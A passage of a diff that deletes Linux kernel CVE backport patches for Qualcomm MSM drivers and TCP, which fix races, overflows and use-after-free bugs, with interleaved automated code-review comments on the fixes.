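Review bot: The `pr_err` added in mdss_mdp_wb_import_data has no trailing newline, unlike the one added in mdss_mdp_layer_pre_commit_wfd; it should read `pr_err("buffer plane_count exceeds MAX_PLANES limit:%d\n", buffer->plane_count);`. Both checks sit in front of loops that index a `planes` array, so a short comment such as `/* plane_count comes from the caller; it indexes planes[MAX_PLANES] below */` would record why they must stay ahead of the loop. Separately, the context line `if (IS_ERR_OR_NULL(data)) return PTR_ERR(data);` returns 0 when `data` is NULL, so that case is reported as success; an explicit `return data ? PTR_ERR(data) : -ENOMEM;` would avoid that.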
@@ -1,43 +0,0 @@ -From c9a6f09f1030cec591df837622cb54bbb2d24ddc Mon Sep 17 00:00:00 2001 -From: Sandeep Panda -Date: Fri, 12 May 2017 10:56:32 +0530 -Subject: msm: mdss: remove client from device list if failed to register - -If there is any failure while registering a DBA client with MDSS -driver, then remove the client from device client list first and -then free the client. Otherwise driver might crash when -traversing the device client list in later stage, because of an -uninitialized entry in the list. - -Change-Id: I60666f4c3dea5c7ea7b7c77bcb14b080ee25b54d -Signed-off-by: Sandeep Panda ---- - drivers/video/fbdev/msm/msm_dba/msm_dba.c | 7 ++++++- - 1 file changed, 6 insertions(+), 1 deletion(-) - -diff --git a/drivers/video/fbdev/msm/msm_dba/msm_dba.c b/drivers/video/fbdev/msm/msm_dba/msm_dba.c -index 7a5c9d9..cc6512a 100644 ---- a/drivers/video/fbdev/msm/msm_dba/msm_dba.c -+++ b/drivers/video/fbdev/msm/msm_dba/msm_dba.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2015, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2015,2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -80,6 +80,11 @@ void *msm_dba_register_client(struct msm_dba_reg_info *info, - if (rc) { - pr_err("%s: Client register failed (%s, %d)\n", - __func__, info->chip_name, info->instance_id); -+ /* remove the client from list before freeing */ -+ mutex_lock_nested(&device->dev_mutex, -+ SINGLE_DEPTH_NESTING); -+ list_del(&client->list); -+ mutex_unlock(&device->dev_mutex); - kfree(client); - mutex_unlock(®ister_mutex); - return ERR_PTR(rc); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8279/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8279/ANY/0001.patch deleted file mode 100644 index 32cedec5..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8279/ANY/0001.patch +++ /dev/null 
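Review bot: The error path in msm_dba_register_client now unlinks the client before `kfree`, but the client is still put on the device list before registration is known to have succeeded. The `list_add` is outside this hunk; if nothing requires the early insertion, moving it after the successful register call would mean a half-initialised client is never reachable through the list, and the unlink on failure would not be needed. `mutex_lock_nested(&device->dev_mutex, SINGLE_DEPTH_NESTING)` is a lockdep annotation for nesting locks of the same class; if `dev_mutex` and `register_mutex` are distinct classes a plain `mutex_lock` is enough, unless the rest of the file uses the nested form for this lock. A comment stating the lock order (`register_mutex`, then `dev_mutex`) would document what this path relies on.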
@@ -1,388 +0,0 @@
-From f09aee50c2ee6b79d94cb42eafc82413968b15cb Mon Sep 17 00:00:00 2001
-From: Gopikrishna Mogasati
-Date: Fri, 5 May 2017 16:04:35 +0530
-Subject: diag: Add proper synchronization checks to msg mask table
-
-This fix removes dependency between real time message mask
-table and build time message mask table. Also this fix
-synchronizes retrieval and modification of real time message
-mask table.
-
-CRs-Fixed: 2015227
-Change-Id: Id0a0964337ec4645d7061fc35120dfa061a990ff
-Signed-off-by: Gopikrishna Mogasati
----
- drivers/char/diag/diag_masks.c | 65 +++++++++++++++++++++++---------------
- drivers/char/diag/diagchar.h | 2 ++
- drivers/char/diag/diagchar_core.c | 1 +
- drivers/char/diag/diagfwd_cntl.c | 11 ++++---
- 4 files changed, 49 insertions(+), 30 deletions(-)
-
-diff --git a/drivers/char/diag/diag_masks.c b/drivers/char/diag/diag_masks.c
-index 3c10462..382717b 100644
---- a/drivers/char/diag/diag_masks.c
-+++ b/drivers/char/diag/diag_masks.c
-@@ -309,10 +309,12 @@ static void diag_send_msg_mask_update(uint8_t peripheral, int first, int last)
-
- if (!mask_info || !mask_info->ptr || !mask_info->update_buf)
- return;
--
-+ mutex_lock(&driver->msg_mask_lock);
- mask = (struct diag_msg_mask_t *)mask_info->ptr;
-- if (!mask->ptr)
-+ if (!mask->ptr) {
-+ mutex_unlock(&driver->msg_mask_lock);
- return;
-+ }
- buf = mask_info->update_buf;
- mutex_lock(&mask_info->lock);
- switch (mask_info->status) {
-@@ -385,6 +387,7 @@ proceed:
- }
- err:
- mutex_unlock(&mask_info->lock);
-+ mutex_unlock(&driver->msg_mask_lock);
- }
-
- static void diag_send_time_sync_update(uint8_t peripheral)
-@@ -506,7 +509,7 @@ static int diag_cmd_get_ssid_range(unsigned char *src_buf, int src_len,
-
- if (!diag_apps_responds())
- return 0;
--
-+ mutex_lock(&driver->msg_mask_lock);
- rsp.cmd_code = DIAG_CMD_MSG_CONFIG;
- rsp.sub_cmd = DIAG_CMD_OP_GET_SSID_RANGE;
- rsp.status = MSG_STATUS_SUCCESS;
-@@ -514,7 +517,6 @@ static int diag_cmd_get_ssid_range(unsigned char *src_buf, int src_len,
- rsp.count = driver->msg_mask_tbl_count;
- memcpy(dest_buf, &rsp, sizeof(rsp));
- write_len += sizeof(rsp);
--
- mask_ptr = (struct diag_msg_mask_t *)mask_info->ptr;
- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask_ptr++) {
- if (write_len + sizeof(ssid_range) > dest_len) {
-@@ -527,7 +529,7 @@ static int diag_cmd_get_ssid_range(unsigned char *src_buf, int src_len,
- memcpy(dest_buf + write_len, &ssid_range, sizeof(ssid_range));
- write_len += sizeof(ssid_range);
- }
--
-+ mutex_unlock(&driver->msg_mask_lock);
- return write_len;
- }
-
-@@ -551,7 +553,7 @@ static int diag_cmd_get_build_mask(unsigned char *src_buf, int src_len,
-
- if (!diag_apps_responds())
- return 0;
--
-+ mutex_lock(&driver->msg_mask_lock);
- req = (struct diag_build_mask_req_t *)src_buf;
- rsp.cmd_code = DIAG_CMD_MSG_CONFIG;
- rsp.sub_cmd = DIAG_CMD_OP_GET_BUILD_MASK;
-@@ -559,9 +561,8 @@ static int diag_cmd_get_build_mask(unsigned char *src_buf, int src_len,
- rsp.ssid_last = req->ssid_last;
- rsp.status = MSG_STATUS_FAIL;
- rsp.padding = 0;
--
- build_mask = (struct diag_msg_mask_t *)msg_bt_mask.ptr;
-- for (i = 0; i < driver->msg_mask_tbl_count; i++, build_mask++) {
-+ for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, build_mask++) {
- if (build_mask->ssid_first != req->ssid_first)
- continue;
- num_entries = req->ssid_last - req->ssid_first + 1;
-@@ -582,7 +583,7 @@ static int diag_cmd_get_build_mask(unsigned char *src_buf, int src_len,
- }
- memcpy(dest_buf, &rsp, sizeof(rsp));
- write_len += sizeof(rsp);
--
-+ mutex_unlock(&driver->msg_mask_lock);
- return write_len;
- }
-
-@@ -610,6 +611,7 @@ static int diag_cmd_get_msg_mask(unsigned char *src_buf, int src_len,
- if (!diag_apps_responds())
- return 0;
-
-+ mutex_lock(&driver->msg_mask_lock);
- req = (struct diag_build_mask_req_t *)src_buf;
- rsp.cmd_code = DIAG_CMD_MSG_CONFIG;
- rsp.sub_cmd = DIAG_CMD_OP_GET_MSG_MASK;
-@@ -617,7 +619,6 @@ static int diag_cmd_get_msg_mask(unsigned char *src_buf, int src_len,
- rsp.ssid_last = req->ssid_last;
- rsp.status = MSG_STATUS_FAIL;
- rsp.padding = 0;
--
- mask = (struct diag_msg_mask_t *)mask_info->ptr;
- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
- if ((req->ssid_first < mask->ssid_first) ||
-@@ -635,7 +636,7 @@ static int diag_cmd_get_msg_mask(unsigned char *src_buf, int src_len,
- }
- memcpy(dest_buf, &rsp, sizeof(rsp));
- write_len += sizeof(rsp);
--
-+ mutex_unlock(&driver->msg_mask_lock);
- return write_len;
- }
-
-@@ -666,7 +667,7 @@ static int diag_cmd_set_msg_mask(unsigned char *src_buf, int src_len,
- }
-
- req = (struct diag_msg_build_mask_t *)src_buf;
--
-+ mutex_lock(&driver->msg_mask_lock);
- mutex_lock(&mask_info->lock);
- mask = (struct diag_msg_mask_t *)mask_info->ptr;
- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -726,7 +727,7 @@ static int diag_cmd_set_msg_mask(unsigned char *src_buf, int src_len,
- break;
- }
- mutex_unlock(&mask_info->lock);
--
-+ mutex_unlock(&driver->msg_mask_lock);
- if (diag_check_update(APPS_DATA))
- diag_update_userspace_clients(MSG_MASKS_TYPE);
-
-@@ -779,7 +780,7 @@ static int diag_cmd_set_all_msg_mask(unsigned char *src_buf, int src_len,
- }
-
- req = (struct diag_msg_config_rsp_t *)src_buf;
--
-+ mutex_lock(&driver->msg_mask_lock);
- mask = (struct diag_msg_mask_t *)mask_info->ptr;
- mutex_lock(&mask_info->lock);
- mask_info->status = (req->rt_mask) ? DIAG_CTRL_MASK_ALL_ENABLED :
-@@ -791,6 +792,7 @@ static int diag_cmd_set_all_msg_mask(unsigned char *src_buf, int src_len,
- mutex_unlock(&mask->lock);
- }
- mutex_unlock(&mask_info->lock);
-+ mutex_unlock(&driver->msg_mask_lock);
-
- if (diag_check_update(APPS_DATA))
- diag_update_userspace_clients(MSG_MASKS_TYPE);
-@@ -1294,6 +1296,7 @@ static int diag_create_msg_mask_table(void)
- struct diag_msg_mask_t *mask = (struct diag_msg_mask_t *)msg_mask.ptr;
- struct diag_ssid_range_t range;
-
-+ mutex_lock(&driver->msg_mask_lock);
- mutex_lock(&msg_mask.lock);
- driver->msg_mask_tbl_count = MSG_MASK_TBL_CNT;
- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -1304,6 +1307,7 @@ static int diag_create_msg_mask_table(void)
- break;
- }
- mutex_unlock(&msg_mask.lock);
-+ mutex_unlock(&driver->msg_mask_lock);
- return err;
- }
-
-@@ -1316,9 +1320,11 @@ static int diag_create_build_time_mask(void)
- struct diag_msg_mask_t *build_mask = NULL;
- struct diag_ssid_range_t range;
-
-+ mutex_lock(&driver->msg_mask_lock);
- mutex_lock(&msg_bt_mask.lock);
-+ driver->bt_msg_mask_tbl_count = MSG_MASK_TBL_CNT;
- build_mask = (struct diag_msg_mask_t *)msg_bt_mask.ptr;
-- for (i = 0; i < driver->msg_mask_tbl_count; i++, build_mask++) {
-+ for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, build_mask++) {
- range.ssid_first = msg_mask_tbl[i].ssid_first;
- range.ssid_last = msg_mask_tbl[i].ssid_last;
- err = diag_create_msg_mask_table_entry(build_mask, &range);
-@@ -1429,6 +1435,7 @@ static int diag_create_build_time_mask(void)
- memcpy(build_mask->ptr, tbl, tbl_size);
- }
- mutex_unlock(&msg_bt_mask.lock);
-+ mutex_unlock(&driver->msg_mask_lock);
-
- return err;
- }
-@@ -1576,10 +1583,11 @@ static int diag_msg_mask_init(void)
- pr_err("diag: Unable to create msg masks, err: %d\n", err);
- return err;
- }
-+ mutex_lock(&driver->msg_mask_lock);
- driver->msg_mask = &msg_mask;
--
- for (i = 0; i < NUM_PERIPHERALS; i++)
- driver->max_ssid_count[i] = 0;
-+ mutex_unlock(&driver->msg_mask_lock);
-
- return 0;
- }
-@@ -1598,7 +1606,7 @@ int diag_msg_mask_copy(struct diag_mask_info *dest, struct diag_mask_info *src)
- err = __diag_mask_init(dest, MSG_MASK_SIZE, APPS_BUF_SIZE);
- if (err)
- return err;
--
-+ mutex_lock(&driver->msg_mask_lock);
- mutex_lock(&dest->lock);
- src_mask = (struct diag_msg_mask_t *)src->ptr;
- dest_mask = (struct diag_msg_mask_t *)dest->ptr;
-@@ -1617,6 +1625,7 @@ int diag_msg_mask_copy(struct diag_mask_info *dest, struct diag_mask_info *src)
- dest_mask++;
- }
- mutex_unlock(&dest->lock);
-+ mutex_unlock(&driver->msg_mask_lock);
-
- return err;
- }
-@@ -1628,7 +1637,7 @@ void diag_msg_mask_free(struct diag_mask_info *mask_info)
-
- if (!mask_info)
- return;
--
-+ mutex_lock(&driver->msg_mask_lock);
- mutex_lock(&mask_info->lock);
- mask = (struct diag_msg_mask_t *)mask_info->ptr;
- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -1636,7 +1645,7 @@ void diag_msg_mask_free(struct diag_mask_info *mask_info)
- mask->ptr = NULL;
- }
- mutex_unlock(&mask_info->lock);
--
-+ mutex_unlock(&driver->msg_mask_lock);
- __diag_mask_exit(mask_info);
- }
-
-@@ -1644,15 +1653,17 @@ static void diag_msg_mask_exit(void)
- {
- int i;
- struct diag_msg_mask_t *mask = NULL;
--
-+ mutex_lock(&driver->msg_mask_lock);
- mask = (struct diag_msg_mask_t *)(msg_mask.ptr);
- if (mask) {
- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++)
- kfree(mask->ptr);
- kfree(msg_mask.ptr);
-+ msg_mask.ptr = NULL;
- }
--
- kfree(msg_mask.update_buf);
-+ msg_mask.update_buf = NULL;
-+ mutex_unlock(&driver->msg_mask_lock);
- }
-
- static int diag_build_time_mask_init(void)
-@@ -1677,13 +1688,15 @@ static void diag_build_time_mask_exit(void)
- {
- int i;
- struct diag_msg_mask_t *mask = NULL;
--
-+ mutex_lock(&driver->msg_mask_lock);
- mask = (struct diag_msg_mask_t *)(msg_bt_mask.ptr);
- if (mask) {
-- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++)
-+ for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, mask++)
- kfree(mask->ptr);
-- kfree(msg_mask.ptr);
-+ kfree(msg_bt_mask.ptr);
-+ msg_bt_mask.ptr = NULL;
- }
-+ mutex_unlock(&driver->msg_mask_lock);
- }
-
- static int diag_log_mask_init(void)
-@@ -1801,7 +1814,7 @@ int diag_copy_to_user_msg_mask(char __user *buf, size_t count,
- return -EIO;
- }
- mutex_unlock(&driver->diag_maskclear_mutex);
--
-+ mutex_lock(&driver->msg_mask_lock);
- mutex_lock(&mask_info->lock);
- mask = (struct diag_msg_mask_t *)(mask_info->ptr);
- for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -1840,7 +1853,7 @@ int diag_copy_to_user_msg_mask(char __user *buf, size_t count,
- total_len += len;
- }
- mutex_unlock(&mask_info->lock);
--
-+ mutex_unlock(&driver->msg_mask_lock);
- return err ? err : total_len;
- }
-
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index b17538a..4047a2c 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -627,8 +627,10 @@ struct diagchar_dev {
- struct diag_mask_info *event_mask;
- struct diag_mask_info *build_time_mask;
- uint8_t msg_mask_tbl_count;
-+ uint8_t bt_msg_mask_tbl_count;
- uint16_t event_mask_size;
- uint16_t last_event_id;
-+ struct mutex msg_mask_lock;
- /* Variables for Mask Centralization */
- uint16_t num_event_id[NUM_PERIPHERALS];
- uint32_t num_equip_id[NUM_PERIPHERALS];
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 682c035..afba265 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -3568,6 +3568,7 @@ static int __init diagchar_init(void)
- mutex_init(&driver->diag_file_mutex);
- mutex_init(&driver->delayed_rsp_mutex);
- mutex_init(&apps_data_mutex);
-+ mutex_init(&driver->msg_mask_lock);
- for (i = 0; i < NUM_PERIPHERALS; i++)
- mutex_init(&driver->diagfwd_channel_mutex[i]);
- mutex_init(&driver->diagfwd_untag_mutex);
-diff --git a/drivers/char/diag/diagfwd_cntl.c b/drivers/char/diag/diagfwd_cntl.c
-index 82a67f1..729fbf4 100644
---- a/drivers/char/diag/diagfwd_cntl.c
-+++ b/drivers/char/diag/diagfwd_cntl.c
-@@ -548,6 +548,7 @@ static void process_ssid_range_report(uint8_t *buf, uint32_t len,
- /* Don't account for pkt_id and length */
- read_len += header_len - (2 * sizeof(uint32_t));
-
-+ mutex_lock(&driver->msg_mask_lock);
- driver->max_ssid_count[peripheral] = header->count;
- for (i = 0; i < header->count && read_len < len; i++) {
- ssid_range = (struct diag_ssid_range_t *)ptr;
-@@ -591,6 +592,7 @@ static void process_ssid_range_report(uint8_t *buf, uint32_t len,
- }
- driver->msg_mask_tbl_count += 1;
- }
-+ mutex_unlock(&driver->msg_mask_lock);
- }
-
- static void diag_build_time_mask_update(uint8_t *buf,
-@@ -615,11 +617,11 @@ static void diag_build_time_mask_update(uint8_t *buf,
- __func__, range->ssid_first, range->ssid_last);
- return;
- }
--
-+ mutex_lock(&driver->msg_mask_lock);
- build_mask = (struct diag_msg_mask_t *)(driver->build_time_mask->ptr);
- num_items = range->ssid_last - range->ssid_first + 1;
-
-- for (i = 0; i < driver->msg_mask_tbl_count; i++, build_mask++) {
-+ for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, build_mask++) {
- if (build_mask->ssid_first != range->ssid_first)
- continue;
- found = 1;
-@@ -638,7 +640,7 @@ static void diag_build_time_mask_update(uint8_t *buf,
-
- if (found)
- goto end;
-- new_size = (driver->msg_mask_tbl_count + 1) *
-+ new_size = (driver->bt_msg_mask_tbl_count + 1) *
- sizeof(struct diag_msg_mask_t);
- temp = krealloc(driver->build_time_mask->ptr, new_size, GFP_KERNEL);
- if (!temp) {
-@@ -653,8 +655,9 @@ static void diag_build_time_mask_update(uint8_t *buf,
- __func__, err);
- goto end;
- }
-- driver->msg_mask_tbl_count += 1;
-+ driver->bt_msg_mask_tbl_count += 1;
- end:
-+ mutex_unlock(&driver->msg_mask_lock);
- return;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8280/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8280/ANY/0001.patch
deleted file mode 100644
index b598d592..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8280/ANY/0001.patch
+++ /dev/null
@@ -1,191 +0,0 @@
-From 49b9a02eaaeb0b70608c6fbcadff7d83833b9614 Mon Sep 17 00:00:00 2001
-From: Sarada Prasanna Garnayak
-Date: Mon, 17 Apr 2017 14:29:57 +0530
-Subject: wcnss: fix the potential memory leak and heap overflow
-
-The wcnss platform driver update the wlan calibration data
-by the user space wlan daemon. The wlan user space daemon store
-the updated wlan calibration data reported by wlan firmware in
-user space and write it back to the wcnss platform calibration
-data buffer for the calibration data download and update.
-
-During the wlan calibration data store and retrieve operation
-there are some potential race condition which leads to memory leak
-and buffer overflow during the context switch.
-
-Fix the above issue by adding protection code and avoid usage of
-global pointer during the device file read and write operation.
-
-CRs-Fixed: 2015858
-Change-Id: Ib5b57eb86dcb4e6ed799b5222d06396eaabfaad3
-Signed-off-by: Sarada Prasanna Garnayak
----
- drivers/net/wireless/wcnss/wcnss_wlan.c | 87 +++++++++++++++++++--------------
- 1 file changed, 51 insertions(+), 36 deletions(-)
-
-diff --git a/drivers/net/wireless/wcnss/wcnss_wlan.c b/drivers/net/wireless/wcnss/wcnss_wlan.c
-index 11ba537..3171a40 100644
---- a/drivers/net/wireless/wcnss/wcnss_wlan.c
-+++ b/drivers/net/wireless/wcnss/wcnss_wlan.c
-@@ -396,7 +396,6 @@ static struct {
- int user_cal_available;
- u32 user_cal_rcvd;
- int user_cal_exp_size;
-- int device_opened;
- int iris_xo_mode_set;
- int fw_vbatt_state;
- char wlan_nv_macAddr[WLAN_MAC_ADDR_SIZE];
-@@ -3284,14 +3283,6 @@ static int wcnss_node_open(struct inode *inode, struct file *file)
- return -EFAULT;
- }
-
-- mutex_lock(&penv->dev_lock);
-- penv->user_cal_rcvd = 0;
-- penv->user_cal_read = 0;
-- penv->user_cal_available = false;
-- penv->user_cal_data = NULL;
-- penv->device_opened = 1;
-- mutex_unlock(&penv->dev_lock);
--
- return rc;
- }
-
-@@ -3300,7 +3291,7 @@ static ssize_t wcnss_wlan_read(struct file *fp, char __user
- {
- int rc = 0;
-
-- if (!penv || !penv->device_opened)
-+ if (!penv)
- return -EFAULT;
-
- rc = wait_event_interruptible(penv->read_wait, penv->fw_cal_rcvd
-@@ -3337,55 +3328,66 @@ static ssize_t wcnss_wlan_write(struct file *fp, const char __user
- *user_buffer, size_t count, loff_t *position)
- {
- int rc = 0;
-- u32 size = 0;
-+ char *cal_data = NULL;
-
-- if (!penv || !penv->device_opened || penv->user_cal_available)
-+ if (!penv || penv->user_cal_available)
- return -EFAULT;
-
-- if (penv->user_cal_rcvd == 0 && count >= 4
-- && !penv->user_cal_data) {
-- rc = copy_from_user((void *)&size, user_buffer, 4);
-- if (!size || size > MAX_CALIBRATED_DATA_SIZE) {
-- pr_err(DEVICE " invalid size to write %d\n", size);
-+ if (!penv->user_cal_rcvd && count >= 4 && !penv->user_cal_exp_size) {
-+ mutex_lock(&penv->dev_lock);
-+ rc = copy_from_user((void *)&penv->user_cal_exp_size,
-+ user_buffer, 4);
-+ if (!penv->user_cal_exp_size ||
-+ penv->user_cal_exp_size > MAX_CALIBRATED_DATA_SIZE) {
-+ pr_err(DEVICE " invalid size to write %d\n",
-+ penv->user_cal_exp_size);
-+ penv->user_cal_exp_size = 0;
-+ mutex_unlock(&penv->dev_lock);
- return -EFAULT;
- }
--
-- rc += count;
-- count -= 4;
-- penv->user_cal_exp_size = size;
-- penv->user_cal_data = kmalloc(size, GFP_KERNEL);
-- if (penv->user_cal_data == NULL) {
-- pr_err(DEVICE " no memory to write\n");
-- return -ENOMEM;
-- }
-- if (0 == count)
-- goto exit;
--
-- } else if (penv->user_cal_rcvd == 0 && count < 4)
-+ mutex_unlock(&penv->dev_lock);
-+ return count;
-+ } else if (!penv->user_cal_rcvd && count < 4) {
- return -EFAULT;
-+ }
-
-+ mutex_lock(&penv->dev_lock);
- if ((UINT32_MAX - count < penv->user_cal_rcvd) ||
- (penv->user_cal_exp_size < count + penv->user_cal_rcvd)) {
- pr_err(DEVICE " invalid size to write %zu\n", count +
- penv->user_cal_rcvd);
-- rc = -ENOMEM;
-- goto exit;
-+ mutex_unlock(&penv->dev_lock);
-+ return -ENOMEM;
- }
-- rc = copy_from_user((void *)penv->user_cal_data +
-- penv->user_cal_rcvd, user_buffer, count);
-- if (0 == rc) {
-+
-+ cal_data = kmalloc(count, GFP_KERNEL);
-+ if (!cal_data) {
-+ mutex_unlock(&penv->dev_lock);
-+ return -ENOMEM;
-+ }
-+
-+ rc = copy_from_user(cal_data, user_buffer, count);
-+ if (!rc) {
-+ memcpy(penv->user_cal_data + penv->user_cal_rcvd,
-+ cal_data, count);
- penv->user_cal_rcvd += count;
- rc += count;
- }
-+
-+ kfree(cal_data);
- if (penv->user_cal_rcvd == penv->user_cal_exp_size) {
- penv->user_cal_available = true;
- pr_info_ratelimited("wcnss: user cal written");
- }
-+ mutex_unlock(&penv->dev_lock);
-
--exit:
- return rc;
- }
-
-+static int wcnss_node_release(struct inode *inode, struct file *file)
-+{
-+ return 0;
-+}
-
- static int wcnss_notif_cb(struct notifier_block *this, unsigned long code,
- void *ss_handle)
-@@ -3444,6 +3446,7 @@ static const struct file_operations wcnss_node_fops = {
- .open = wcnss_node_open,
- .read = wcnss_wlan_read,
- .write = wcnss_wlan_write,
-+ .release = wcnss_node_release,
- };
-
- static struct miscdevice wcnss_misc = {
-@@ -3471,6 +3474,13 @@ wcnss_wlan_probe(struct platform_device *pdev)
- }
- penv->pdev = pdev;
-
-+ penv->user_cal_data =
-+ devm_kzalloc(&pdev->dev, MAX_CALIBRATED_DATA_SIZE, GFP_KERNEL);
-+ if (!penv->user_cal_data) {
-+ dev_err(&pdev->dev, "Failed to alloc memory for cal data.\n");
-+ return -ENOMEM;
-+ }
-+
- /* register sysfs entries */
- ret = wcnss_create_sysfs(&pdev->dev);
- if (ret) {
-@@ -3491,6 +3501,11 @@ wcnss_wlan_probe(struct platform_device *pdev)
- mutex_init(&penv->pm_qos_mutex);
- init_waitqueue_head(&penv->read_wait);
-
-+ penv->user_cal_rcvd = 0;
-+ penv->user_cal_read = 0;
-+ penv->user_cal_exp_size = 0;
-+ penv->user_cal_available = false;
-+
- /* Since we were built into the kernel we'll be called as part
- * of kernel initialization. We don't know if userspace
- * applications are available to service PIL at this time
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8281/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-8281/3.18/0001.patch
deleted file mode 100644
index 93ed6a1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8281/3.18/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 9be5b16de622c2426408425e3df29e945cd21d37 Mon Sep 17 00:00:00 2001
-From: Kasin Li
-Date: Wed, 22 Feb 2017 18:25:36 +0800
-Subject: drm/msm: Fix potential buffer overflow issue
-
-In function submit_create, if nr_cmds or nr_bos is assigned with
-negative value, the allocated buffer may be small than intended.
-Using this buffer will lead to buffer overflow issue.
-
-Change-Id: I0b61cccffd836e2dd3c859446470af4b6451b9ed
-Signed-off-by: Kasin Li
----
- drivers/gpu/drm/msm/msm_gem_submit.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
-index adbb0cb..fa9b641 100644
---- a/drivers/gpu/drm/msm/msm_gem_submit.c
-+++ b/drivers/gpu/drm/msm/msm_gem_submit.c
-@@ -34,12 +34,15 @@ static inline void __user *to_user_ptr(u64 address)
- }
-
- static struct msm_gem_submit *submit_create(struct drm_device *dev,
-- struct msm_gpu *gpu, int nr_cmds, int nr_bos)
-+ struct msm_gpu *gpu, uint32_t nr_cmds, uint32_t nr_bos)
- {
- struct msm_gem_submit *submit;
-- int sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
-+ uint64_t sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
- (nr_cmds * sizeof(submit->cmd[0]));
-
-+ if (sz > SIZE_MAX)
-+ return NULL;
-+
- submit = kmalloc(sz, GFP_TEMPORARY | __GFP_NOWARN | __GFP_NORETRY);
- if (submit) {
- submit->dev = dev;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8281/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8281/4.4/0002.patch
deleted file mode 100644
index 7d248fb1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8281/4.4/0002.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 9b209c4552779edb86221787fb8681dd212e3a0c Mon Sep 17 00:00:00 2001
-From: Mohit Aggarwal
-Date: Sat, 22 Apr 2017 10:49:18 +0530
-Subject: diag: dci: Add protection while querying event status
-
-Currently, protection is missing when querying event
-status due to which already removed dci client entry
-might be accessed. This patch takes care of issue by
-taking proper locking.
-
-CRs-Fixed: 2015892
-Change-Id: I4195c4c6198d85e96559f1728d74419527a76bc5
-Signed-off-by: Mohit Aggarwal
----
- drivers/char/diag/diagchar_core.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 574a13d..9a5f196 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -2336,7 +2336,9 @@ long diagchar_ioctl(struct file *filp,
- mutex_unlock(&driver->dci_mutex);
- break;
- case DIAG_IOCTL_DCI_EVENT_STATUS:
-+ mutex_lock(&driver->dci_mutex);
- result = diag_ioctl_dci_event_status(ioarg);
-+ mutex_unlock(&driver->dci_mutex);
- break;
- case DIAG_IOCTL_DCI_CLEAR_LOGS:
- mutex_lock(&driver->dci_mutex);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-8890/3.10/0002.patch
deleted file mode 100644
index adc039a1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/3.10/0002.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 1853870b216d3446efd39190a8ff0006c54dfd46 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Tue, 9 May 2017 06:29:19 -0700
-Subject: [PATCH] BACKPORT: dccp/tcp: do not inherit mc_list from parent
-
-syzkaller found a way to trigger double frees from ip_mc_drop_socket()
-
-It turns out that leave a copy of parent mc_list at accept() time,
-which is very bad.
-
-Very similar to commit 8b485ce69876 ("tcp: do not inherit
-fastopen_req from parent")
-
-Initial report from Pray3r, completed by Andrey one.
-Thanks a lot to them !
-
-Signed-off-by: Eric Dumazet
-Reported-by: Pray3r
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Signed-off-by: David S. Miller
-Signed-off-by: Roberto Pereira
-(cherry picked from commit 657831ffc38e30092a2d5f03d385d710eb88b09a)
-Bug:38413975
-Change-Id: Icf89ad025cb8225e806e52c573d68533912111ad
----
- net/ipv4/inet_connection_sock.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
-index 64198a381ddca..008b52bc99a3d 100644
---- a/net/ipv4/inet_connection_sock.c
-+++ b/net/ipv4/inet_connection_sock.c
-@@ -697,6 +697,8 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
- inet_sk(newsk)->inet_sport = inet_rsk(req)->loc_port;
- newsk->sk_write_space = sk_stream_write_space;
-
-+ inet_sk(newsk)->mc_list = NULL;
-+
- newsk->sk_mark = inet_rsk(req)->ir_mark;
-
